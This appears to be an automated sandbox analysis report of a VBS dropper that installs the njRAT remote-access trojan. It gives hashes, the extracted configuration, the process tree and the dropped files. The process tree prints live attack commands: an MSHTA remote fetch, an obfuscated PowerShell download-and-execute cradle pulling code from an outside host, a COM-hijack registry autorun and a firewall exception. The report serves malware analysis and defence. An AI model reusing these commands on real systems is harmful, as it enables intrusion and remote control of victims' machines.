Analysis
-
max time kernel
145s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
-
submitted
09-08-2022 19:01
General
-
Target
ZURLRYOHRJILYWHHLBXSQO.vbs
-
Size
1KB
-
MD5
5f15ed0b10945b58f1d89fd89e7816a2
-
SHA1
0912be608b29f1bb905f9758e5b791f43531fc3b
-
SHA256
b529175e6e3cd7badb222d3a863d034241489835759f9557d8e8aae52e562706
-
SHA512
3e92fc68eb3de3dd8373842c8f4566323299803425ff8a80764f40f762a0680b5d30aeabb9f7a3efb189ebd3c0594ca7c4292a3e26836955db81ad260a144cae
Malware Config
Extracted
https://tradeguru.com.pk/enc3.txt
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 3 IoCs
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Modifies registry class 4 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ZURLRYOHRJILYWHHLBXSQO.vbs"1⤵
-
C:\Windows\system32\MSHTA.EXEMSHTA.EXE https://tradeguru.com.pk/enc3.txt1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HAAEOALBRXAIOCSRBGSCEDW = '[\<5<_!]70#&-5)7@5(59]4y\<5<_!]70#&-5)7@5(59]4t(_*)})-[*\[/(%/0^!%{(@<{3%\$}7!6&14]}&1*=57[.IO.\<5<_!]70#&-5)7@5(59]4t_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}<{3%\$}7!6&14]}&1*=57[_13[9$#[<1/}#^#2^8$$[)(_*)})-[*\[/(%/0^!%{(@]61=$}4}}4^7<*&/@!%+\}d(_*)})-[*\[/(%/0^!%{(@_13[9$#[<1/}#^#2^8$$[)]'.Replace('\<5<_!]70#&-5)7@5(59]4','S').Replace('(_*)})-[*\[/(%/0^!%{(@','E').Replace('_13[9$#[<1/}#^#2^8$$[)','R').Replace(']61=$}4}}4^7<*&/@!%+\}','A').Replace('<{3%\$}7!6&14]}&1*=57[','M');$HLTYLQWQUSUZZXXCFYGBYAD = ($HAAEOALBRXAIOCSRBGSCEDW -Join '')|&('I'+'EX');$HZJDPHHLCFDWDOVEILVRHQQ = '[07^[^&[4<5=268_/]+1(-!y07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<_/$_4}0]/-)5%[/3\9@76@m.N_/$_4}0]/-)5%[/3\9@76@02=(]2+25)4/&*#[$2}36<.W_/$_4}0]/-)5%[/3\9@76@bR_/$_4}0]/-)5%[/3\9@76@qu_/$_4}0]/-)5%[/3\9@76@07^[^&[4<5=268_/]+1(-!02=(]2+25)4/&*#[$2}36<]'.Replace('07^[^&[4<5=268_/]+1(-!','S').Replace('_/$_4}0]/-)5%[/3\9@76@','E').Replace('02=(]2+25)4/&*#[$2}36<','T');$HGWVOWBJIRKOZPAZDHKCXFR = ($HZJDPHHLCFDWDOVEILVRHQQ -Join '')|&('I'+'EX');$HATKNHVTWEYFZVGJTJKPOJF = '<&]4^<529_}0((#90_50&$r0*)$60%](_0*8%7$%{4&\_a[#}02[3_+}(*7!^3}[*#350*)$60%](_0*8%7$%{4&\_'.Replace('<&]4^<529_}0((#90_50&$','C').Replace('0*)$60%](_0*8%7$%{4&\_','E').Replace('[#}02[3_+}(*7!^3}[*#35','T');$HIGJPHAPDSYPKOSVELGREOR = '<2!\3]6!6<&_+7)[9)}\/^<+8]/@<9<^(+${/4-7%@)(tR<+8]/@<9<^(+${/4-7%@)(1*)9%/*/(56%3__7\}!\11pon1*)9%/*/(56%3__7\}!\11<+8]/@<9<^(+${/4-7%@)('.Replace('<2!\3]6!6<&_+7)[9)}\/^','G').Replace('<+8]/@<9<^(+${/4-7%@)(','E').Replace('1*)9%/*/(56%3__7\}!\11','S');$HRFXTROBLKIFECVKROLDLJL = 'G&/+0%*9_1+*1&)^)2$3<+(t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%pon21{}\5[($(]@_+8_\1+1\%&/+0%*9_1+*1&)^)2$3<+(21{}\5[($(]@_+8_\1+1\%t(+<</9]!8<4(%}5)_9!{*7&/+0%*9_1+*1&)^)2$3<+(am'.Replace('21{}\5[($(]@_+8_\1+1\%','S').Replace('&/+0%*9_1+*1&)^)2$3<+(','E').Replace('(+<</9]!8<4(%}5)_9!{*7','R');$HPLYZILQXYLUTLCHOFQSIZE = '}_5)50/8//-/@10^)<{_$(\/5+^${{)\1@]!}04*@126a}&%406_!1]{7-7^%}&%50[To\/5+^${{)\1@]!}04*@126n}&%406_!1]{7-7^%}&%50['.Replace('}_5)50/8//-/@10^)<{_$(','R').Replace('\/5+^${{)\1@]!}04*@126','E').Replace('}&%406_!1]{7-7^%}&%50[','D');&('I'+'EX')($HLTYLQWQUSUZZXXCFYGBYAD::new($HGWVOWBJIRKOZPAZDHKCXFR::$HATKNHVTWEYFZVGJTJKPOJF('https://tradeguru.com.pk/Server3.txt').$HIGJPHAPDSYPKOSVELGREOR().$HRFXTROBLKIFECVKROLDLJL()).$HPLYZILQXYLUTLCHOFQSIZE())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\GSSATJYQVFXWDHYBOJICNJ.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.batFilesize
706B
MD51a2189e850187ca0cfadf5eba71bf87b
SHA1022de59e2f7a4ada62a34c701d35a8f6b738a140
SHA256d19e4c732fd1125438cb1d7e2278d9420fad7d3e66fcc6c56879258364664997
SHA5129acf6053091a18388b9da45ea7147b71bbeb3acda7697d311ce9a416578595427ec3661a41c09abed75ae155d11c15b3573883effa25eeb86cfbf93eb515d49d
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.ps1Filesize
3KB
MD51fe311d146874fa10f4eedf9941dabd4
SHA14ea8f6f1fcc57a1cba5b388e11df6c3a58fc9709
SHA256804d3783e70a5a575eeb0e7d617186bd1f8dcbd3244a736521194948fa80ea1d
SHA5127a70c224d707ff7a723daa86ded140987fbf52d38a2c1cdacc1d04c53c447b78fa5cb49843eeebf126fa95cb72b44f436581b383ebde645ab53105d5f8fc74bb
-
C:\ProgramData\KORTNZNFXYLKCPAFVEQYIT\KORTNZNFXYLKCPAFVEQYIT.vbsFilesize
1KB
MD58b0c7083e7b7bb3a886e13dcd0830ba9
SHA1444748aad7b9289f1b371aaac955c0554ca62d17
SHA25645bbe8aafd1246fa15881a63f3cb8997a35cfc3e78ba306fc5abbaf72cf2867e
SHA512d23a9aa4d91231b26eca8c61a6487e9f151be19a45ce7a8bfb818ebd16803cfad219ae594cfb57263e7044e9f73d3705239267345f0e03a7e478f196938d3c89
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5c14cfe9cceee0b2fa2f4d0638215f4b7
SHA15895dd3fcff705cd16caba80ecc28edb67591fe0
SHA2569a6678bda60018ea04abbd3a5569f2349a4e9a1d533d150e030197330a5ec02b
SHA512c9b31f7914e4ee36306aed9625188c45e820e94ccd542a63a0ce73f19989eaa699e407a74db0c66fe7b6492b9564cd7d0c078ff044be20ea5f700a864577428c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bc34f67b09ef76be9c393b6fb6508a35
SHA17c59c76b6afb72f268e07e1c8ec7dd7f3860ebdb
SHA2568d8540e29fff09fbed6d44d34adbe5c89c005a6c7b44426dce62dcdd1bd414c6
SHA5124a0ffb8c01a44edd58d92473a2b1fe169dd669d4821b7bc0617f03f1b646788a7db76f4c08b447f87a54c787d49b90560e0f97bccf88019e68300d5ddeeb387f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
memory/1156-131-0x000001A7D1E50000-0x000001A7D1E72000-memory.dmpFilesize
136KB
-
memory/1156-133-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/1156-132-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/1156-151-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/1160-138-0x0000000000000000-mapping.dmp
-
memory/1216-140-0x0000000000000000-mapping.dmp
-
memory/1284-141-0x0000000000000000-mapping.dmp
-
memory/2748-161-0x0000000000000000-mapping.dmp
-
memory/3396-144-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/3396-157-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/3588-155-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/3588-145-0x0000000000000000-mapping.dmp
-
memory/3588-150-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/4468-159-0x0000000005430000-0x00000000059D4000-memory.dmpFilesize
5.6MB
-
memory/4468-153-0x000000000040BBBE-mapping.dmp
-
memory/4468-152-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/4468-158-0x0000000004DE0000-0x0000000004E7C000-memory.dmpFilesize
624KB
-
memory/4468-160-0x0000000004F40000-0x0000000004FD2000-memory.dmpFilesize
584KB
-
memory/4468-162-0x0000000005AD0000-0x0000000005ADA000-memory.dmpFilesize
40KB
-
memory/4468-163-0x0000000000B50000-0x0000000000BB6000-memory.dmpFilesize
408KB
-
memory/4936-143-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/4936-147-0x00007FFE78180000-0x00007FFE78C41000-memory.dmpFilesize
10.8MB
-
memory/4936-134-0x0000000000000000-mapping.dmp
-
memory/4980-142-0x0000000000000000-mapping.dmp
-
memory/5056-136-0x0000000000000000-mapping.dmp